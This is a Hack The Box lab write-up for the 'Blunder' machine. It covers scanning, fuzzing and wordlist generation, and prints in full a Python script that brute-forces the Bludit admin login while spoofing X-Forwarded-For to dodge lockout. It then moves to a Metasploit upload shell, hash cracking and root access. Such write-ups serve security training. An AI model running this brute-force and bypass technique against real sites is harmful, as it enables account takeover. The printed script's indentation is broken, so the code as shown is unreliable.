Blunder

Source: https://app.hackthebox.com/machines/254

. . .

Introduction

At the time, when I am writing this blog, the machine is still live and this is the first time I am ever going to try doing this. Let’s hope I am able to root this.

. . .

Scanning & Enumeration

> ------------------------Nmap Results-----------------------------<
--------------------------------------------------------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 04:01 IST
Nmap scan report for 10.10.10.191
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9(90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   197.45 ms 10.10.14.1
2   197.48 ms 10.10.10.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.65 seconds
--------------------------------------------------------------------

From the results above, we see that we have only FTP and HTTP, out of which FTP is closed.

HTTP Enumeration

Landing Page
Landing Page

The landing page looks like a dump of random facts.

But this part suggests, that there might be more than what just meets the eye.
Looking at the source code reveals a lot of directories that are exposed
1. /bl-themes
2. /bl-kernel
3. /bl-content
Going through all of them, we find that ‘/bl-content/uploads/pages’ has a lot more entries than just the 3 posts that we see on the landing page.

All the folders inside /bl-content was empty. But we saw that one file should have been there, as we saw it in the source.

Let’s try gobuster to see if we find anything new.

gobuster results
gobuster results

We see ‘/admin’

Admin Portal
Admin Portal

This tells us that it is using BLUDIT CMS.

Let’s fuzz a little more.

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100
Wfuzz Results
Wfuzz Results

We find ‘todo’, let’s look at the content there.

Contents of todo.txt
Contents of todo.txt

Now we have a username for the system, i.e. fergus.

. . .

Vulnerability Analysis

Searchsploit Results
Searchsploit Results

We see that there are different exploits available in searchsploit.

The first Metasploit module looks promising, because, we can upload an image, and as we saw in the source code that a call was being made, we can maybe leverage that to get a shell.

Once we think in that direction, we realize that we need to get authorization. This takes us back to enumeration.

cewl -w wordlists.txt -d 10 -m 1 http://blunder.htb/

This will generate a wordlist, now we can try to bruteforce the login using the username and the wordlist.

#!/usr/bin/env python3
import re
import requests
#from __future__ import print_function
def open_ressources(file_path):
    return [item.replace("\n", "") for item in open(file_path).readlines()]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/media/Warehouse/Work/0xAadi/HackTheBox/blunder/wordlist.txt')
for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

After we run this, we have the password.

Bruteforce Password
Bruteforce Password
. . .

Exploitation

Let’s jump to Metasploit, yes I will here because this is not a part of the OSCP series.

Meterpreter Shell
Meterpreter Shell

Once we are in, we see that there is a user called hugo, but we have no idea how to get that. So I keep wandering around, and then see that there is another bludit directory inside /var/www. Well, this is interesting!

I found users.php inside, and it has the hash to the password for user Hugo, let’s get cracking.

I tried rockyou.txt, but that obviously didn’t work. Let’s look up online.

This is a great website.

Got my hash cracked and was able to login as hugo.

Shell with user "hugo"
Shell with user "hugo"
. . .

Privesc

Once we have our initial shell, let’s privesc.

So i started wandering round and about. And I saw some photos on shaun’s picture directory. Now this is not exactly a privesc, but in one of the photos we see the contents of root.txt.

The user has run some poc.py and the directory /usr/sbin/local has this `buf`

Screenshot on shaun's directory
Screenshot on shaun's directory

This is what we find. Well, naive me, I typed it all out. didn’t work !

Shell with Root Privileges
Shell with Root Privileges

Finally got root!

Thank you for reading, please provide your feedback and share with people who are in need. :)

. . .